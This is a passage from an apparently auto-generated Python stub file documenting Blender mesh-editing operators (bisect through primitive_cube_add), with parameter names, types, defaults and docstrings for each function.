xend: int = 0,
ystart: int = 0,
yend: int = 0,
cursor: int = 5):
'''Cut geometry along a plane (click-drag to define plane)
:param plane_co: Plane Point, A point on the plane
:type plane_co: float
:param plane_no: Plane Normal, The direction the plane points
:type plane_no: float
:param use_fill: Fill, Fill in the cut
:type use_fill: bool
:param clear_inner: Clear Inner, Remove geometry behind the plane
:type clear_inner: bool
:param clear_outer: Clear Outer, Remove geometry in front of the plane
:type clear_outer: bool
:param threshold: Axis Threshold, Preserves the existing geometry along the cut plane
:type threshold: float
:param xstart: X Start
:type xstart: int
:param xend: X End
:type xend: int
:param ystart: Y Start
:type ystart: int
:param yend: Y End
:type yend: int
:param cursor: Cursor, Mouse cursor style to use during the modal operator
:type cursor: int
'''
pass
def blend_from_shape(shape: typing.Union[int, str] = '',
blend: float = 1.0,
add: bool = True):
'''Blend in shape from a shape key
:param shape: Shape, Shape key to use for blending
:type shape: typing.Union[int, str]
:param blend: Blend, Blending factor
:type blend: float
:param add: Add, Add rather than blend between shapes
:type add: bool
'''
pass
def bridge_edge_loops(type: typing.Union[int, str] = 'SINGLE',
use_merge: bool = False,
merge_factor: float = 0.5,
twist_offset: int = 0,
number_cuts: int = 0,
interpolation: typing.Union[int, str] = 'PATH',
smoothness: float = 1.0,
profile_shape_factor: float = 0.0,
profile_shape: typing.Union[int, str] = 'SMOOTH'):
'''Create a bridge of faces between two or more selected edge loops
:param type: Connect Loops, Method of bridging multiple loops
:type type: typing.Union[int, str]
:param use_merge: Merge, Merge rather than creating faces
:type use_merge: bool
:param merge_factor: Merge Factor
:type merge_factor: float
:param twist_offset: Twist, Twist offset for closed loops
:type twist_offset: int
:param number_cuts: Number of Cuts
:type number_cuts: int
:param interpolation: Interpolation, Interpolation method
:type interpolation: typing.Union[int, str]
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded
:type profile_shape_factor: float
:param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type profile_shape: typing.Union[int, str]
'''
pass
def colors_reverse():
'''Flip direction of vertex colors inside faces
'''
pass
def colors_rotate(use_ccw: bool = False):
'''Rotate vertex colors inside faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def convex_hull(delete_unused: bool = True,
use_existing_faces: bool = True,
make_holes: bool = False,
join_triangles: bool = True,
face_threshold: float = 0.698132,
shape_threshold: float = 0.698132,
uvs: bool = False,
vcols: bool = False,
seam: bool = False,
sharp: bool = False,
materials: bool = False):
'''Enclose selected vertices in a convex polyhedron
:param delete_unused: Delete Unused, Delete selected elements that are not used by the hull
:type delete_unused: bool
:param use_existing_faces: Use Existing Faces, Skip hull triangles that are covered by a pre-existing face
:type use_existing_faces: bool
:param make_holes: Make Holes, Delete selected faces that are used by the hull
:type make_holes: bool
:param join_triangles: Join Triangles, Merge adjacent triangles into quads
:type join_triangles: bool
:param face_threshold: Max Face Angle, Face angle limit
:type face_threshold: float
:param shape_threshold: Max Shape Angle, Shape angle limit
:type shape_threshold: float
:param uvs: Compare UVs
:type uvs: bool
:param vcols: Compare VCols
:type vcols: bool
:param seam: Compare Seam
:type seam: bool
:param sharp: Compare Sharp
:type sharp: bool
:param materials: Compare Materials
:type materials: bool
'''
pass
def customdata_custom_splitnormals_add():
'''Add a custom split normals layer, if none exists yet
'''
pass
def customdata_custom_splitnormals_clear():
'''Remove the custom split normals layer, if it exists
'''
pass
def customdata_mask_clear():
'''Clear vertex sculpt masking data from the mesh
'''
pass
def customdata_skin_add():
'''Add a vertex skin layer
'''
pass
def customdata_skin_clear():
'''Clear vertex skin layer
'''
pass
def decimate(ratio: float = 1.0,
use_vertex_group: bool = False,
vertex_group_factor: float = 1.0,
invert_vertex_group: bool = False,
use_symmetry: bool = False,
symmetry_axis: typing.Union[int, str] = 'Y'):
'''Simplify geometry by collapsing edges
:param ratio: Ratio
:type ratio: float
:param use_vertex_group: Vertex Group, Use active vertex group as an influence
:type use_vertex_group: bool
:param vertex_group_factor: Weight, Vertex group strength
:type vertex_group_factor: float
:param invert_vertex_group: Invert, Invert vertex group influence
:type invert_vertex_group: bool
:param use_symmetry: Symmetry, Maintain symmetry on an axis
:type use_symmetry: bool
:param symmetry_axis: Axis, Axis of symmetry
:type symmetry_axis: typing.Union[int, str]
'''
pass
def delete(type: typing.Union[int, str] = 'VERT'):
'''Delete selected vertices, edges or faces
:param type: Type, Method used for deleting mesh data
:type type: typing.Union[int, str]
'''
pass
def delete_edgeloop(use_face_split: bool = True):
'''Delete an edge loop by merging the faces on each side
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
'''
pass
def delete_loose(use_verts: bool = True,
use_edges: bool = True,
use_faces: bool = False):
'''Delete loose vertices, edges or faces
:param use_verts: Vertices, Remove loose vertices
:type use_verts: bool
:param use_edges: Edges, Remove loose edges
:type use_edges: bool
:param use_faces: Faces, Remove loose faces
:type use_faces: bool
'''
pass
def dissolve_degenerate(threshold: float = 0.0001):
'''Dissolve zero area faces and zero length edges
:param threshold: Merge Distance, Maximum distance between elements to merge
:type threshold: float
'''
pass
def dissolve_edges(use_verts: bool = True, use_face_split: bool = False):
'''Dissolve edges, merging faces
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
'''
pass
def dissolve_faces(use_verts: bool = False):
'''Dissolve faces
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
'''
pass
def dissolve_limited(angle_limit: float = 0.0872665,
use_dissolve_boundaries: bool = False,
delimit: typing.Set[typing.Union[int, str]] = {'NORMAL'}):
'''Dissolve selected edges and verts, limited by the angle of surrounding geometry
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
:param use_dissolve_boundaries: All Boundaries, Dissolve all vertices in between face boundaries
:type use_dissolve_boundaries: bool
:param delimit: Delimit, Delimit dissolve operationNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def dissolve_mode(use_verts: bool = False,
use_face_split: bool = False,
use_boundary_tear: bool = False):
'''Dissolve geometry based on the selection mode
:param use_verts: Dissolve Verts, Dissolve remaining vertices
:type use_verts: bool
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
:param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces
:type use_boundary_tear: bool
'''
pass
def dissolve_verts(use_face_split: bool = False,
use_boundary_tear: bool = False):
'''Dissolve verts, merge edges and faces
:param use_face_split: Face Split, Split off face corners to maintain surrounding geometry
:type use_face_split: bool
:param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces
:type use_boundary_tear: bool
'''
pass
def dupli_extrude_cursor(rotate_source: bool = True):
'''Duplicate and extrude selected vertices, edges or faces towards the mouse cursor
:param rotate_source: Rotate Source, Rotate initial selection giving better shape
:type rotate_source: bool
'''
pass
def duplicate(mode: int = 1):
'''Duplicate selected vertices, edges or faces
:param mode: Mode
:type mode: int
'''
pass
def duplicate_move(MESH_OT_duplicate=None, TRANSFORM_OT_translate=None):
'''Duplicate mesh and move
:param MESH_OT_duplicate: Duplicate, Duplicate selected vertices, edges or faces
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def edge_collapse():
'''Collapse selected edges
'''
pass
def edge_face_add():
'''Add an edge or face to selected
'''
pass
def edge_rotate(use_ccw: bool = False):
'''Rotate selected edge or adjoining faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def edge_split():
'''Split selected edges so that each neighbor face gets its own copy
'''
pass
def edgering_select(extend: bool = False,
deselect: bool = False,
toggle: bool = False,
ring: bool = True):
'''Select an edge ring
:param extend: Extend, Extend the selection
:type extend: bool
:param deselect: Deselect, Remove from the selection
:type deselect: bool
:param toggle: Toggle Select, Toggle the selection
:type toggle: bool
:param ring: Select Ring, Select ring
:type ring: bool
'''
pass
def edges_select_sharp(sharpness: float = 0.523599):
'''Select all sharp-enough edges
:param sharpness: Sharpness
:type sharpness: float
'''
pass
def extrude_context(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude selection
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_context_move(MESH_OT_extrude_context=None,
TRANSFORM_OT_translate=None):
'''Extrude region together along the average normal
:param MESH_OT_extrude_context: Extrude Context, Extrude selection
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_edges_indiv(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude individual edges only
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_edges_move(MESH_OT_extrude_edges_indiv=None,
TRANSFORM_OT_translate=None):
'''Extrude edges and move result
:param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_faces_indiv(mirror: bool = False):
'''Extrude individual faces only
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_faces_move(MESH_OT_extrude_faces_indiv=None,
TRANSFORM_OT_shrink_fatten=None):
'''Extrude each individual face separately along local normals
:param MESH_OT_extrude_faces_indiv: Extrude Individual Faces, Extrude individual faces only
:param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals
'''
pass
def extrude_region(use_normal_flip: bool = False, mirror: bool = False):
'''Extrude region of faces
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def extrude_region_move(MESH_OT_extrude_region=None,
TRANSFORM_OT_translate=None):
'''Extrude region and move result
:param MESH_OT_extrude_region: Extrude Region, Extrude region of faces
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_region_shrink_fatten(MESH_OT_extrude_region=None,
TRANSFORM_OT_shrink_fatten=None):
'''Extrude region together along local normals
:param MESH_OT_extrude_region: Extrude Region, Extrude region of faces
:param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals
'''
pass
def extrude_repeat(offset: float = 2.0, steps: int = 10):
'''Extrude selected vertices, edges or faces repeatedly
:param offset: Offset
:type offset: float
:param steps: Steps
:type steps: int
'''
pass
def extrude_vertices_move(MESH_OT_extrude_verts_indiv=None,
TRANSFORM_OT_translate=None):
'''Extrude vertices and move result
:param MESH_OT_extrude_verts_indiv: Extrude Only Vertices, Extrude individual vertices only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def extrude_verts_indiv(mirror: bool = False):
'''Extrude individual vertices only
:param mirror: Mirror Editing
:type mirror: bool
'''
pass
def face_make_planar(factor: float = 1.0, repeat: int = 1):
'''Flatten selected faces
:param factor: Factor
:type factor: float
:param repeat: Iterations
:type repeat: int
'''
pass
def face_split_by_edges():
'''Weld loose edges into faces (splitting them into new faces)
'''
pass
def faces_mirror_uv(direction: typing.Union[int, str] = 'POSITIVE',
precision: int = 3):
'''Copy mirror UV coordinates on the X axis based on a mirrored mesh
:param direction: Axis Direction
:type direction: typing.Union[int, str]
:param precision: Precision, Tolerance for finding vertex duplicates
:type precision: int
'''
pass
def faces_select_linked_flat(sharpness: float = 0.0174533):
'''Select linked faces by angle
:param sharpness: Sharpness
:type sharpness: float
'''
pass
def faces_shade_flat():
'''Display faces flat
'''
pass
def faces_shade_smooth():
'''Display faces smooth (using vertex normals)
'''
pass
def fill(use_beauty: bool = True):
'''Fill a selected edge loop with faces
:param use_beauty: Beauty, Use best triangulation division
:type use_beauty: bool
'''
pass
def fill_grid(span: int = 1, offset: int = 0, use_interp_simple: bool = False):
'''Fill grid from two loops
:param span: Span, Number of grid columns
:type span: int
:param offset: Offset, Vertex that is the corner of the grid
:type offset: int
:param use_interp_simple: Simple Blending, Use simple interpolation of grid vertices
:type use_interp_simple: bool
'''
pass
def fill_holes(sides: int = 4):
'''Fill in holes (boundary edge loops)
:param sides: Sides, Number of sides in hole required to fill (zero fills all holes)
:type sides: int
'''
pass
def flip_normals():
'''Flip the direction of selected faces’ normals (and of their vertices)
'''
pass
def hide(unselected: bool = False):
'''Hide (un)selected vertices, edges or faces
:param unselected: Unselected, Hide unselected rather than selected
:type unselected: bool
'''
pass
def inset(use_boundary: bool = True,
use_even_offset: bool = True,
use_relative_offset: bool = False,
use_edge_rail: bool = False,
thickness: float = 0.0,
depth: float = 0.0,
use_outset: bool = False,
use_select_inset: bool = False,
use_individual: bool = False,
use_interpolate: bool = True,
release_confirm: bool = False):
'''Inset new faces into selected faces
:param use_boundary: Boundary, Inset face boundaries
:type use_boundary: bool
:param use_even_offset: Offset Even, Scale the offset to give more even thickness
:type use_even_offset: bool
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param use_edge_rail: Edge Rail, Inset the region along existing edges
:type use_edge_rail: bool
:param thickness: Thickness
:type thickness: float
:param depth: Depth
:type depth: float
:param use_outset: Outset, Outset rather than inset
:type use_outset: bool
:param use_select_inset: Select Outer, Select the new inset faces
:type use_select_inset: bool
:param use_individual: Individual, Individual Face Inset
:type use_individual: bool
:param use_interpolate: Interpolate, Blend face data across the inset
:type use_interpolate: bool
:param release_confirm: Confirm on Release
:type release_confirm: bool
'''
pass
def intersect(mode: typing.Union[int, str] = 'SELECT_UNSELECT',
separate_mode: typing.Union[int, str] = 'CUT',
threshold: float = 1e-06):
'''Cut an intersection into faces
:param mode: SourceSELECT Self Intersect, Self intersect selected faces.SELECT_UNSELECT Selected/Unselected, Intersect selected with unselected faces.
:type mode: typing.Union[int, str]
:param separate_mode: Separate ModeALL All, Separate all geometry from intersections.CUT Cut, Cut into geometry keeping each side separate (Selected/Unselected only).NONE Merge, Merge all geometry from the intersection.
:type separate_mode: typing.Union[int, str]
:param threshold: Merge threshold
:type threshold: float
'''
pass
def intersect_boolean(operation: typing.Union[int, str] = 'DIFFERENCE',
use_swap: bool = False,
threshold: float = 1e-06):
'''Cut solid geometry from selected to unselected
:param operation: Boolean
:type operation: typing.Union[int, str]
:param use_swap: Swap, Use with difference intersection to swap which side is kept
:type use_swap: bool
:param threshold: Merge threshold
:type threshold: float
'''
pass
def knife_project(cut_through: bool = False):
'''Use other objects outlines & boundaries to project knife cuts
:param cut_through: Cut through, Cut through all faces, not just visible ones
:type cut_through: bool
'''
pass
def knife_tool(use_occlude_geometry: bool = True,
only_selected: bool = False,
wait_for_input: bool = True):
'''Cut new topology
:param use_occlude_geometry: Occlude Geometry, Only cut the front most geometry
:type use_occlude_geometry: bool
:param only_selected: Only Selected, Only cut selected geometry
:type only_selected: bool
:param wait_for_input: Wait for Input
:type wait_for_input: bool
'''
pass
def loop_multi_select(ring: bool = False):
'''Select a loop of connected edges by connection type
:param ring: Ring
:type ring: bool
'''
pass
def loop_select(extend: bool = False,
deselect: bool = False,
toggle: bool = False,
ring: bool = False):
'''Select a loop of connected edges
:param extend: Extend Select, Extend the selection
:type extend: bool
:param deselect: Deselect, Remove from the selection
:type deselect: bool
:param toggle: Toggle Select, Toggle the selection
:type toggle: bool
:param ring: Select Ring, Select ring
:type ring: bool
'''
pass
def loop_to_region(select_bigger: bool = False):
'''Select region of faces inside of a selected loop of edges
:param select_bigger: Select Bigger, Select bigger regions instead of smaller ones
:type select_bigger: bool
'''
pass
def loopcut(number_cuts: int = 1,
smoothness: float = 0.0,
falloff: typing.Union[int, str] = 'INVERSE_SQUARE',
object_index: int = -1,
edge_index: int = -1,
mesh_select_mode_init=(False, False, False)):
'''Add a new loop between existing loops
:param number_cuts: Number of Cuts
:type number_cuts: int
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param falloff: Falloff, Falloff type the featherSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type falloff: typing.Union[int, str]
:param object_index: Object Index
:type object_index: int
:param edge_index: Edge Index
:type edge_index: int
'''
pass
def loopcut_slide(MESH_OT_loopcut=None, TRANSFORM_OT_edge_slide=None):
'''Cut mesh loop and slide it
:param MESH_OT_loopcut: Loop Cut, Add a new loop between existing loops
:param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh
'''
pass
def mark_freestyle_edge(clear: bool = False):
'''(Un)mark selected edges as Freestyle feature edges
:param clear: Clear
:type clear: bool
'''
pass
def mark_freestyle_face(clear: bool = False):
'''(Un)mark selected faces for exclusion from Freestyle feature edge detection
:param clear: Clear
:type clear: bool
'''
pass
def mark_seam(clear: bool = False):
'''(Un)mark selected edges as a seam
:param clear: Clear
:type clear: bool
'''
pass
def mark_sharp(clear: bool = False, use_verts: bool = False):
'''(Un)mark selected edges as sharp
:param clear: Clear
:type clear: bool
:param use_verts: Vertices, Consider vertices instead of edges to select which edges to (un)tag as sharp
:type use_verts: bool
'''
pass
def merge(type: typing.Union[int, str] = 'CENTER', uvs: bool = False):
'''Merge selected vertices
:param type: Type, Merge method to use
:type type: typing.Union[int, str]
:param uvs: UVs, Move UVs according to merge
:type uvs: bool
'''
pass
def merge_normals():
'''Merge custom normals of selected vertices
'''
pass
def mod_weighted_strength(set: bool = False,
face_strength: typing.Union[int, str] = 'MEDIUM'):
'''Set/Get strength of face (used in Weighted Normal modifier)
:param set: Set value, Set Value of faces
:type set: bool
:param face_strength: Face Strength, Strength to use for assigning or selecting face influence for weighted normal modifier
:type face_strength: typing.Union[int, str]
'''
pass
def normals_make_consistent(inside: bool = False):
'''Make face and vertex normals point either outside or inside the mesh
:param inside: Inside
:type inside: bool
'''
pass
def normals_tools(mode: typing.Union[int, str] = 'COPY',
absolute: bool = False):
'''Custom normals tools using Normal Vector of UI
:param mode: Mode, Mode of tools taking input from InterfaceCOPY Copy Normal, Copy normal to buffer.PASTE Paste Normal, Paste normal from buffer.ADD Add Normal, Add normal vector with selection.MULTIPLY Multiply Normal, Multiply normal vector with selection.RESET Reset Normal, Reset buffer and/or normal of selected element.
:type mode: typing.Union[int, str]
:param absolute: Absolute Coordinates, Copy Absolute coordinates or Normal vector
:type absolute: bool
'''
pass
def offset_edge_loops(use_cap_endpoint: bool = False):
'''Create offset edge loop from the current selection
:param use_cap_endpoint: Cap Endpoint, Extend loop around end-points
:type use_cap_endpoint: bool
'''
pass
def offset_edge_loops_slide(MESH_OT_offset_edge_loops=None,
TRANSFORM_OT_edge_slide=None):
'''Offset edge loop slide
:param MESH_OT_offset_edge_loops: Offset Edge Loop, Create offset edge loop from the current selection
:param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh
'''
pass
def paint_mask_extract(mask_threshold: float = 0.5,
add_boundary_loop: bool = True,
smooth_iterations: int = 4,
apply_shrinkwrap: bool = True,
add_solidify: bool = True):
'''Create a new mesh object from the current paint mask
:param mask_threshold: Threshold, Minimum mask value to consider the vertex valid to extract a face from the original mesh
:type mask_threshold: float
:param add_boundary_loop: Add Boundary Loop, Add an extra edge loop to better preserve the shape when applying a subdivision surface modifier
:type add_boundary_loop: bool
:param smooth_iterations: Smooth Iterations, Smooth iterations applied to the extracted mesh
:type smooth_iterations: int
:param apply_shrinkwrap: Project to Sculpt, Project the extracted mesh into the original sculpt
:type apply_shrinkwrap: bool
:param add_solidify: Extract as Solid, Extract the mask as a solid object with a solidify modifier
:type add_solidify: bool
'''
pass
def point_normals(mode: typing.Union[int, str] = 'COORDINATES',
invert: bool = False,
align: bool = False,
target_location: float = (0.0, 0.0, 0.0),
spherize: bool = False,
spherize_strength: float = 0.1):
'''Point selected custom normals to specified Target
:param mode: Mode, How to define coordinates to point custom normals toCOORDINATES Coordinates, Use static coordinates (defined by various means).MOUSE Mouse, Follow mouse cursor.
:type mode: typing.Union[int, str]
:param invert: Invert, Invert affected normals
:type invert: bool
:param align: Align, Make all affected normals parallel
:type align: bool
:param target_location: Target, Target location to which normals will point
:type target_location: float
:param spherize: Spherize, Interpolate between original and new normals
:type spherize: bool
:param spherize_strength: Spherize Strength, Ratio of spherized normal to original normal
:type spherize_strength: float
'''
pass
def poke(offset: float = 0.0,
use_relative_offset: bool = False,
center_mode: typing.Union[int, str] = 'MEDIAN_WEIGHTED'):
'''Split a face into a fan
:param offset: Poke Offset, Poke Offset
:type offset: float
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param center_mode: Poke Center, Poke Face Center CalculationMEDIAN_WEIGHTED Weighted Median, Weighted median face center.MEDIAN Median, Median face center.BOUNDS Bounds, Face bounds center.
:type center_mode: typing.Union[int, str]
'''
pass
def polybuild_delete_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_dissolve_at_cursor():
'''Undocumented contribute <https://developer.blender.org/T51061>
'''
pass
def polybuild_extrude_at_cursor_move(
MESH_OT_polybuild_transform_at_cursor=None,
MESH_OT_extrude_edges_indiv=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor
:param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_face_at_cursor(
create_quads: bool = True,
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param create_quads: Create quads, Automatically split edges in triangles to maintain quad topology
:type create_quads: bool
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_face_at_cursor_move(MESH_OT_polybuild_face_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_face_at_cursor: Poly Build Face at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_split_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_split_at_cursor_move(MESH_OT_polybuild_split_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_split_at_cursor: Poly Build Split at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def polybuild_transform_at_cursor(
mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def polybuild_transform_at_cursor_move(
MESH_OT_polybuild_transform_at_cursor=None,
TRANSFORM_OT_translate=None):
'''Undocumented contribute <https://developer.blender.org/T51061>
:param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def primitive_circle_add(vertices: int = 32,
radius: float = 1.0,
fill_type: typing.Union[int, str] = 'NOTHING',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a circle mesh
:param vertices: Vertices
:type vertices: int
:param radius: Radius
:type radius: float
:param fill_type: Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_cone_add(vertices: int = 32,
radius1: float = 1.0,
radius2: float = 0.0,
depth: float = 2.0,
end_fill_type: typing.Union[int, str] = 'NGON',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a conic mesh
:param vertices: Vertices
:type vertices: int
:param radius1: Radius 1
:type radius1: float
:param radius2: Radius 2
:type radius2: float
:param depth: Depth
:type depth: float
:param end_fill_type: Base Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type end_fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_cube_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a cube mesh
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
